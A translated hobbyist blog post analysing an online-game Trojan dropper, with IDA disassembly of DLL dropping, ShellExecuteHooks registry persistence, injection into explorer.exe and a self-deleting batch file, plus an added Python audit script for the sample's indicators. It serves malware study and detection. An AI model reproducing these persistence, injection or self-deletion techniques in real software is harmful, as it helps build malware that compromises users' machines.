[Author's note]: I learned assembly in July this year, bought 《加密与解密3》 (Encryption and Decryption, 3rd ed.) in September and formally started studying software security; looking back at the road since then I have a lot of feelings! Before the new year arrives, I am publishing an article to mark it ^-^
Analysis of an online-game Trojan
This article analyses the virus source file and the DLL it generates separately. The virus has the following behaviour:
(1) After running, the virus drops rijxckin.dll into C:\WINDOWS\system32\
(2) It creates the following registry entries:
1. HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Game\JXQY\Url
2. HKEY_CLASSES_ROOT\CLSID\{35FD6584-698F-BCD2-602C-698745210353}\InprocServer32\"",
3. HKEY_CLASSES_ROOT\CLSID\{35FD6584-698F-BCD2-602C-698745210353}\InprocServer32\ThreadingModel,
4. HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\ShellExecuteHooks\{35FD6584-698F-BCD2-602C-698745210353}, with the data "rijxckin.dll"
(3) It injects the file C:\WINDOWS\system32\rijxzkin.dll into the explorer process
(4) It creates a .bat file in the temporary folder that deletes the virus's own file; the .bat content is as follows (where C:\a.exe is the path of the virus file):
@echo off
:Loop
del "C:\a.exe"
if exist "C\a.exe" goto Loop
(1) After running, the virus drops rijxckin.dll into C:\WINDOWS\system32\
Step 1: search the path C:\WINDOWS\system32\ to see whether the file rijxckin.dll is present
Unpacker:004026A8 FindFile proc near ; CODE XREF: FindBatFileAndDel+8 p
Unpacker:004026A8 ; FindBatFileAndDel+24 p ...
Unpacker:004026A8
Unpacker:004026A8 var_144 = byte ptr -144h
Unpacker:004026A8
Unpacker:004026A8 push ebx
Unpacker:004026A9 add esp, 0FFFFFEC0h
Unpacker:004026AF xor ebx, ebx
Unpacker:004026B1 push esp ; lpFindFileData
Unpacker:004026B2 push eax ; lpFileName
Unpacker:004026B3 call FindFirstFileA
Unpacker:004026B8 cmp eax, 0FFFFFFFFh
Unpacker:004026BB jz short loc_4026C5
Unpacker:004026BD test [esp+144h+var_144], 10h
Unpacker:004026C1 jnz short loc_4026C5
Unpacker:004026C3 mov bl, 1
Unpacker:004026C5
Unpacker:004026C5 loc_4026C5: ; CODE XREF: FindFile+13 j
Unpacker:004026C5 ; FindFile+19 j
Unpacker:004026C5 push eax ; hFindFile
Unpacker:004026C6 call FindClose
Unpacker:004026CB mov eax, ebx
Unpacker:004026CD add esp, 140h
Unpacker:004026D3 pop ebx
Unpacker:004026D4 retn
Unpacker:004026D4 FindFile endp
Step 2: if it is not present, drop rijxckin.dll out of the virus's own file into C:\WINDOWS\system32\
Unpacker:00402E2C push esi ; lpFileName
Unpacker:00402E2D mov ecx, offset dword_402F00 ; ASCII "ICO"
Unpacker:00402E32 mov edx, offset aMain ; "MAIN"
Unpacker:00402E37 xor eax, eax ; hModule
Unpacker:00402E39 call CreateDllFile
{
Unpacker:00402AAC CreateDllFile proc near ; CODE XREF: sub_402E18+21 p
Unpacker:00402AAC
Unpacker:00402AAC NumberOfBytesWritten= dword ptr -4
Unpacker:00402AAC lpFileName = dword ptr 8
Unpacker:00402AAC
Unpacker:00402AAC push ebp
Unpacker:00402AAD mov ebp, esp
Unpacker:00402AAF push ecx
Unpacker:00402AB0 push ebx
Unpacker:00402AB1 push esi
Unpacker:00402AB2 push edi
Unpacker:00402AB3 mov ebx, eax
Unpacker:00402AB5 push ecx ; lpType
Unpacker:00402AB6 push edx ; lpName
Unpacker:00402AB7 push ebx ; hModule
Unpacker:00402AB8 call FindResourceA
Unpacker:00402ABD mov esi, eax
Unpacker:00402ABF push esi ; hResInfo
Unpacker:00402AC0 push ebx ; hModule
Unpacker:00402AC1 call SizeofResource
Unpacker:00402AC6 mov edi, eax ;eax=5e00
Unpacker:00402AC8 push esi ; hResInfo
Unpacker:00402AC9 push ebx ; hModule
Unpacker:00402ACA call LoadResource
Unpacker:00402ACF push eax ; hResData
Unpacker:00402AD0 call LockResource
Unpacker:00402AD5 mov esi, eax
Unpacker:00402AD7 push 0 ; hTemplateFile
Unpacker:00402AD9 push 80h ; dwFlagsAndAttributes
Unpacker:00402ADE push 2 ; dwCreationDisposition
Unpacker:00402AE0 push 0 ; lpSecurityAttributes
Unpacker:00402AE2 push 2 ; dwShareMode
Unpacker:00402AE4 push 40000000h ; dwDesiredAccess
Unpacker:00402AE9 mov eax, [ebp+lpFileName]
Unpacker:00402AEC push eax ; lpFileName="C:\WINDOWS\system32\rijxzkin.dll"
Unpacker:00402AED call CreateFileA
Unpacker:00402AF2 mov ebx, eax
Unpacker:00402AF4 push 0 ; lpOverlapped
Unpacker:00402AF6 lea eax, [ebp+NumberOfBytesWritten]
Unpacker:00402AF9 push eax ; lpNumberOfBytesWritten
Unpacker:00402AFA push edi ; nNumberOfBytesToWrite (file length 5E00h)
Unpacker:00402AFB push esi ; lpBuffer ASCII "MZP"
Unpacker:00402AFC push ebx ; hFile
Unpacker:00402AFD call WriteFile_0
Unpacker:00402B02 push ebx ; hObject
Unpacker:00402B03 call CloseHandle
Unpacker:00402B08 mov al, 1
Unpacker:00402B0A pop edi
Unpacker:00402B0B pop esi
Unpacker:00402B0C pop ebx
Unpacker:00402B0D pop ecx
Unpacker:00402B0E pop ebp
Unpacker:00402B0F retn 4
Unpacker:00402B0F CreateDllFile endp
}
(2) Creating the registry entries
1. HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Game\JXQY\Url, with data 00 (200h)
2. HKEY_CLASSES_ROOT\CLSID\{35FD6584-698F-BCD2-602C-698745210353}\InprocServer32\"",
3. HKEY_CLASSES_ROOT\CLSID\{35FD6584-698F-BCD2-602C-698745210353}\InprocServer32\ThreadingModel,
4. HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\ShellExecuteHooks\{35FD6584-698F-BCD2-602C-698745210353}, with the data "rijxckin.dll"
The function that adds the registry values is:
Unpacker:00402B14 AddRegKey proc near ; CODE XREF: sub_402C1C+7F p
Unpacker:00402B14 ; sub_402C1C+D0 p ...
Unpacker:00402B14
Unpacker:00402B14 hKey = dword ptr -4
Unpacker:00402B14 cbData = dword ptr 8
Unpacker:00402B14 lpData = dword ptr 0Ch
Unpacker:00402B14 dwType = dword ptr 10h
Unpacker:00402B14
Unpacker:00402B14 push ebp
Unpacker:00402B15 mov ebp, esp
Unpacker:00402B17 push ecx
Unpacker:00402B18 push ebx
Unpacker:00402B19 mov ebx, ecx
Unpacker:00402B1B lea ecx, [ebp+hKey]
Unpacker:00402B1E push ecx ; phkResult
Unpacker:00402B1F push edx ; lpSubKey
Unpacker:00402B20 push eax ; hKey
Unpacker:00402B21 call RegCreateKeyA
Unpacker:00402B26 mov eax, [ebp+cbData]
Unpacker:00402B29 push eax ; cbData
Unpacker:00402B2A mov eax, [ebp+lpData]
Unpacker:00402B2D push eax ; lpData
Unpacker:00402B2E mov eax, [ebp+dwType]
Unpacker:00402B31 push eax ; dwType
Unpacker:00402B32 push 0 ; Reserved
Unpacker:00402B34 push ebx ; lpValueName
Unpacker:00402B35 mov eax, [ebp+hKey]
Unpacker:00402B38 push eax ; hKey
Unpacker:00402B39 call RegSetValueExA
Unpacker:00402B3E mov ebx, eax
Unpacker:00402B40 mov eax, [ebp+hKey]
Unpacker:00402B43 push eax ; hKey
Unpacker:00402B44 call RegCloseKey_0
Unpacker:00402B49 mov eax, ebx
Unpacker:00402B4B pop ebx
Unpacker:00402B4C pop ecx
Unpacker:00402B4D pop ebp
Unpacker:00402B4E retn 0Ch
Unpacker:00402B4E AddRegKey endp
This function is called in four places to create the values:
00402A34 creates HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Game\JXQY\Url, with data 00 (200h)
00402C9B creates HKEY_CLASSES_ROOT\CLSID\{35FD6584-698F-BCD2-602C-698745210353}\InprocServer32\"",
00402CEC creates HKEY_CLASSES_ROOT\CLSID\{35FD6584-698F-BCD2-602C-698745210353}\InprocServer32\ThreadingModel,
00402D4C creates HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\ShellExecuteHooks\{35FD6584-698F-BCD2-602C-698745210353}, with the data "rijxckin.dll"
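As an added defender-side check (not part of the original analysis), the following Python audits the ShellExecuteHooks key this sample uses for persistence: every CLSID listed there is resolved to the InprocServer32 DLL that explorer.exe will load for it, and entries matching the CLSID or DLL name from the analysis are flagged. The audit logic is a pure function exercised on a constructed registry snapshot; collect_live() is an assumed helper that reads the real keys on a Windows host through the stdlib winreg module.

```python
import sys

# Indicators from the analysis above: the registered CLSID and the dropped DLL.
SUSPECT_CLSID = "{35FD6584-698F-BCD2-602C-698745210353}"
SUSPECT_DLL = "rijxckin.dll"
HOOKS_KEY = r"Software\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks"

def audit_hooks(hooks, inproc_servers):
    """Return (clsid, dll_path, reasons) per ShellExecuteHooks value. hooks: CLSID -> data;
    inproc_servers: CLSID -> InprocServer32 default value, i.e. the DLL explorer.exe loads."""
    findings = []
    for clsid, data in hooks.items():
        server = inproc_servers.get(clsid)
        reasons = []
        if clsid.upper() == SUSPECT_CLSID:
            reasons.append("CLSID matches the analysed sample")
        if any(str(v).lower().endswith(SUSPECT_DLL) for v in (server, data) if v):
            reasons.append("hook loads " + SUSPECT_DLL)
        if server is None:
            reasons.append("no InprocServer32 registered for this CLSID")
        findings.append((clsid, server, reasons))
    return findings

def collect_live():
    """Read the real keys on a Windows host (assumes the stdlib winreg module)."""
    import winreg
    hooks, servers = {}, {}
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, HOOKS_KEY) as key:
        for index in range(winreg.QueryInfoKey(key)[1]):  # [1] = number of values
            name, data, _ = winreg.EnumValue(key, index)
            hooks[name] = data
    for clsid in hooks:
        try:
            with winreg.OpenKey(winreg.HKEY_CLASSES_ROOT, rf"CLSID\{clsid}\InprocServer32") as sub:
                servers[clsid] = winreg.QueryValueEx(sub, "")[0]
        except OSError:
            pass  # CLSID not registered; audit_hooks reports it
    return hooks, servers

# Constructed registry snapshot mirroring what the dropper writes (not captured data).
SAMPLE_HOOKS = {SUSPECT_CLSID: "rijxckin.dll", "{00000000-0000-0000-0000-000000000001}": ""}
SAMPLE_SERVERS = {SUSPECT_CLSID: r"C:\WINDOWS\system32\rijxckin.dll",
                  "{00000000-0000-0000-0000-000000000001}": r"C:\WINDOWS\system32\example.dll"}

if __name__ == "__main__":
    live = collect_live() if sys.platform == "win32" else (SAMPLE_HOOKS, SAMPLE_SERVERS)
    for clsid, dll, reasons in audit_hooks(*live):
        print(clsid, dll, "; ".join(reasons) or "no indicator matched")
```

Run on a Windows host the script reads the live keys; elsewhere it runs against the constructed snapshot, so the output for the first entry shows both indicators while the placeholder hook is listed with none.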
(3) Injecting the file C:\WINDOWS\system32\rijxzkin.dll into the explorer process
This is done in three steps.
Step 1: obtain a handle to explorer.exe
Unpacker:00402510 GetExplorerHandle proc near ; CODE XREF: sub_402DD8+8 p
Unpacker:00402510
Unpacker:00402510 var_138 = dword ptr -138h
Unpacker:00402510 var_114 = byte ptr -114h
Unpacker:00402510
Unpacker:00402510 push ebx
Unpacker:00402511 push esi
Unpacker:00402512 push edi
Unpacker:00402513 push ebp
Unpacker:00402514 add esp, 0FFFFFED8h
Unpacker:0040251A mov ebx, edx
Unpacker:0040251C mov esi, eax
Unpacker:0040251E xor edi, edi
Unpacker:00402520 xor edx, edx
Unpacker:00402522 mov eax, 2
Unpacker:00402527 call CreateModuleSnapshot ; create a snapshot
Unpacker:0040252C mov ebp, eax
Unpacker:0040252E mov [esp+138h+var_138], 128h
Unpacker:00402535 mov edx, esp
Unpacker:00402537 mov eax, ebp
Unpacker:00402539 call FindProcess ; BDS 2005-2006 and Delphi6-7 Visual Component Library
Unpacker:0040253E jmp short loc_402560
Unpacker:00402540 ; ---------------------------------------------------------------------------
Unpacker:00402540
Unpacker:00402540 loc_402540: ; CODE XREF: GetExplorerHandle+58 j
Unpacker:00402540 lea eax, [esp+138h+var_114]
Unpacker:00402544
Unpacker:00402544 loc_402544: ; CODE XREF: Unpacker:loc_40BA44 j
Unpacker:00402544 ; DATA XREF: Unpacker:0040BA3F o
Unpacker:00402544 push eax
Unpacker:00402545 push esi
Unpacker:00402546 call lstrcmpi ; compare the name with "explorer"; if it does not match, loop on and fetch the next one to compare
Unpacker:0040254B test eax, eax
Unpacker:0040254D jnz short loc_402557
Unpacker:0040254F mov edi, [esp+140h+var_138]
Unpacker:00402553 test bl, bl
Unpacker:00402555 jz short loc_40256A
Unpacker:00402557
Unpacker:00402557 loc_402557: ; CODE XREF: GetExplorerHandle+3D j
Unpacker:00402557 mov edx, esp
Unpacker:00402559 mov eax, ebp
Unpacker:0040255B call FindProcessNext ; get the name of the next process in the snapshot
Unpacker:00402560
Unpacker:00402560 loc_402560: ; CODE XREF: GetExplorerHandle+2E j
Unpacker:00402560 cmp eax, 1
Unpacker:00402563 sbb eax, eax
Unpacker:00402565 inc eax
Unpacker:00402566 cmp al, 1
Unpacker:00402568 jz short loc_402540
Unpacker:0040256A
Unpacker:0040256A loc_40256A: ; CODE XREF: GetExplorerHandle+45 j
Unpacker:0040256A push ebp ; hObject
Unpacker:0040256B call CloseHandle
Unpacker:00402570 mov eax, edi
Unpacker:00402572 add esp, 128h
Unpacker:00402578 pop ebp
Unpacker:00402579 pop edi
Unpacker:0040257A pop esi
Unpacker:0040257B pop ebx
Unpacker:0040257B GetExplorerHandle endp ;
Step 2: check whether the explorer process already contains the rijxzkin.dll file
Unpacker:00402580 FindDllModule proc near ; CODE XREF: sub_402DD8+18 p
Unpacker:00402580
Unpacker:00402580 var_234 = dword ptr -234h
Unpacker:00402580 var_220 = dword ptr -220h
Unpacker:00402580 var_214 = byte ptr -214h
Unpacker:00402580 var_114 = byte ptr -114h
Unpacker:00402580
Unpacker:00402580 push ebx
Unpacker:00402581 push esi
Unpacker:00402582 push edi
Unpacker:00402583 push ebp
Unpacker:00402584 add esp, 0FFFFFDDCh
Unpacker:0040258A mov edi, ecx
Unpacker:0040258C mov ebx, edx
Unpacker:0040258E mov esi, eax
Unpacker:00402590 xor ebp, ebp
Unpacker:00402592 test edi, edi
Unpacker:00402594 jz short loc_4025A2
Unpacker:00402596 mov edx, 104h
Unpacker:0040259B mov eax, edi
Unpacker:0040259D call @Windows@ZeroMemory$qqrpvui ; Windows::ZeroMemory(void *,uint)
Unpacker:004025A2
Unpacker:004025A2 loc_4025A2: ; CODE XREF: FindDllModule+14 j
Unpacker:004025A2 mov edx, esi
Unpacker:004025A4 mov eax, 8
Unpacker:004025A9 call CreateModuleSnapshot ; create a snapshot
Unpacker:004025AE mov esi, eax
Unpacker:004025B0 mov [esp+234h+var_234], 224h
Unpacker:004025B0 ; CODE XREF: Unpacker:loc_40BAB4 j
Unpacker:004025B7 mov edx, esp
Unpacker:004025B9 mov eax, esi
Unpacker:004025BB call FindModuleFirst ; check whether the explorer process already has "rijxzkin.dll"
Unpacker:004025C0 cmp eax, 1
Unpacker:004025C3 sbb eax, eax
Unpacker:004025C5 inc eax
Unpacker:004025C6 cmp al, 1
Unpacker:004025C8 jnz short loc_402608
Unpacker:004025CA
Unpacker:004025CA loc_4025CA: ; CODE XREF: FindDllModule+86 j
Unpacker:004025CA test ebx, ebx
Unpacker:004025CC jz short loc_4025DD
Unpacker:004025CE lea eax, [esp+234h+var_214]
Unpacker:004025D2 push eax
Unpacker:004025D3 push ebx
Unpacker:004025D4 call lstrcmpi
Unpacker:004025D9 test eax, eax
Unpacker:004025DB jnz short loc_4025F5
Unpacker:004025DD
Unpacker:004025DD loc_4025DD: ; CODE XREF: FindDllModule+4C j
Unpacker:004025DD test edi, edi
Unpacker:004025DF jz short loc_4025EF
Unpacker:004025E1 lea eax, [esp+234h+var_114]
Unpacker:004025E8 push eax
Unpacker:004025E9 push edi
Unpacker:004025EA call lstrcpy
Unpacker:004025EF
Unpacker:004025EF loc_4025EF: ; CODE XREF: FindDllModule+5F j
Unpacker:004025EF mov ebp, [esp+234h+var_220]
Unpacker:004025F3 jmp short loc_402608
Unpacker:004025F5 ; ---------------------------------------------------------------------------
Unpacker:004025F5
Unpacker:004025F5 loc_4025F5: ; CODE XREF: FindDllModule+5B j
Unpacker:004025F5 mov edx, esp
Unpacker:004025F7 mov eax, esi
Unpacker:004025F9 call FindModuleNext ; keep checking whether "rijxzkin.dll" is already loaded in the explorer process
Unpacker:004025FE cmp eax, 1
Unpacker:00402601 sbb eax, eax
Unpacker:00402603 inc eax
Unpacker:00402604 cmp al, 1
Unpacker:00402606 jz short loc_4025CA
Unpacker:00402608
Unpacker:00402608 loc_402608: ; CODE XREF: FindDllModule+48 j
Unpacker:00402608 ; FindDllModule+73 j
Unpacker:00402608 push esi ; hObject
Unpacker:00402609 call CloseHandle
Unpacker:0040260E mov eax, ebp
Unpacker:00402610 add esp, 224h
Unpacker:00402616 pop ebp
Unpacker:00402617 pop edi
Unpacker:00402618 pop esi
Unpacker:00402619 pop ebx
Unpacker:0040261A retn
Unpacker:0040261A FindDllModule endp